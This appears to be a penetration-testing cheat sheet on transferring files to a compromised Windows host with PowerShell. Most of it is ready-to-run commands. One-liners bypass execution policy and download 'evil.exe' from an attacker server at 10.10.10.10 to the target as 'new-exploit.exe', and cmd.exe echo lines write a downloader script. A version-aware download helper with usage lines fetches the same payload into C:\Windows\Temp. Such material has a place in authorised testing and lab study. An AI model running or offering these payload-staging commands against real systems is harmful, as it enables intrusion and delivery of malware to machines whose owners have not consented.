PowerShell

PowerShell option: PowerShell 1.0 dates from 2006 (an optional install on XP / Server 2003); 2.0 ships by default with Windows 7 / Server 2008 R2 and later, so some version is present on practically every modern Windows target. The one-liners below differ in which version they need, which matters on older hosts.

One-liners

#iwr (Invoke-WebRequest) needs PowerShell 3.0+; the file lands in the current working directory unless -outfile gets a full path
powershell.exe -nop -ep bypass -c "iwr -uri http://10.10.10.10:8000/file.txt -outfile file.txt"

or:

#Remember to specify the port of your web server and the correct path on the target where the file should be written
#serve with Python or Apache; WebClient.DownloadFile works on PowerShell 2.0 as well
powershell.exe -ep bypass -c "(New-Object Net.WebClient).DownloadFile('http://10.10.10.10:8000/file.txt','C:\Windows\Temp\file.txt')"

1) From a cmd.exe shell on the target, echo the PowerShell commands into a wget.ps1 file (do this from cmd.exe, not from a PowerShell prompt, where the $ variables would be expanded before being written; `>>` appends, so remove any existing wget.ps1 first)

#change the $url parameter accordingly

echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = "http://10.10.10.10/evil.exe" >>wget.ps1
echo $file = "new-exploit.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1

2) Run the wget.ps1 script with the execution policy bypassed

powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1

#-ExecutionPolicy Bypass ignores the configured script execution policy for this process only (it is not a security boundary, just a default)
#-NoLogo hides the PowerShell logo banner
#-NonInteractive suppresses the interactive PowerShell prompt
#-NoProfile skips the user's profile scripts, which could otherwise alter or log the session

3) One-liner option (shorter syntax); the relative path 'new-exploit.exe' is written to the current working directory

powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://10.10.10.10/evil.exe', 'new-exploit.exe')
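The three variants above are really one technique with a version dependency: Invoke-WebRequest only exists from PowerShell 3.0, while System.Net.WebClient is available on 2.0. The following helper is an added example, not code from the original page: it picks the right method for the running PowerShell version, forces TLS 1.2 for HTTPS servers, and optionally refuses a download whose SHA256 does not match what you expect, which is a cheap check that you got your own file and not something swapped in transit. The URL, output path and hash are placeholders; serve the file first, e.g. with `python3 -m http.server 8000` on the attacking host.

```powershell
# Added example (not from the original page). Downloads a file on PowerShell 2.0
# (WebClient) or 3.0+ (Invoke-WebRequest) and optionally verifies its SHA256.
# All URLs, paths and hashes below are placeholders to be replaced.
function Get-RemoteFile {
    param(
        [Parameter(Mandatory = $true)][string]$Url,
        [Parameter(Mandatory = $true)][string]$OutFile,
        [string]$ExpectedSha256   # optional: delete the file and abort on mismatch
    )

    # Older .NET defaults to SSL3/TLS 1.0, which many servers now refuse.
    # The enum value is missing on .NET < 4.5, so ignore the error there.
    try {
        [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
    } catch { }

    if ($PSVersionTable.PSVersion.Major -ge 3) {
        # Invoke-WebRequest (alias iwr) exists from PowerShell 3.0 onwards.
        # -UseBasicParsing avoids the Internet Explorer engine dependency.
        Invoke-WebRequest -Uri $Url -OutFile $OutFile -UseBasicParsing
    } else {
        # PowerShell 2.0 (Windows 7 / Server 2008 R2 default): fall back to WebClient.
        (New-Object System.Net.WebClient).DownloadFile($Url, $OutFile)
    }

    if ($ExpectedSha256) {
        # Get-FileHash is PowerShell 4.0+, so hash with .NET to stay 2.0-compatible.
        $sha    = [System.Security.Cryptography.SHA256]::Create()
        $stream = [System.IO.File]::OpenRead($OutFile)
        try {
            $actual = ($sha.ComputeHash($stream) | ForEach-Object { $_.ToString('x2') }) -join ''
        } finally {
            $stream.Close()
        }
        if ($actual -ne $ExpectedSha256.ToLower()) {
            Remove-Item -Path $OutFile -Force
            throw "Hash mismatch for ${OutFile}: got $actual, expected $ExpectedSha256"
        }
    }

    # Return the FileInfo so the caller can check size and path.
    Get-Item -Path $OutFile
}

# Usage with placeholder values (server and hash are assumptions for this example):
# Get-RemoteFile -Url 'http://10.10.10.10:8000/file.txt' -OutFile 'C:\Windows\Temp\file.txt'
# Get-RemoteFile -Url 'http://10.10.10.10:8000/evil.exe' -OutFile 'C:\Windows\Temp\new-exploit.exe' `
#     -ExpectedSha256 '<sha256 of evil.exe computed on the attacking host>'
```

Invoke from a cmd.exe shell the same way as the one-liners, e.g. `powershell.exe -nop -ep bypass -File Get-RemoteFile.ps1` after appending a call at the bottom, or dot-source the script in an existing PowerShell session. Compute the expected hash on your own machine (`sha256sum evil.exe`) before serving it.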
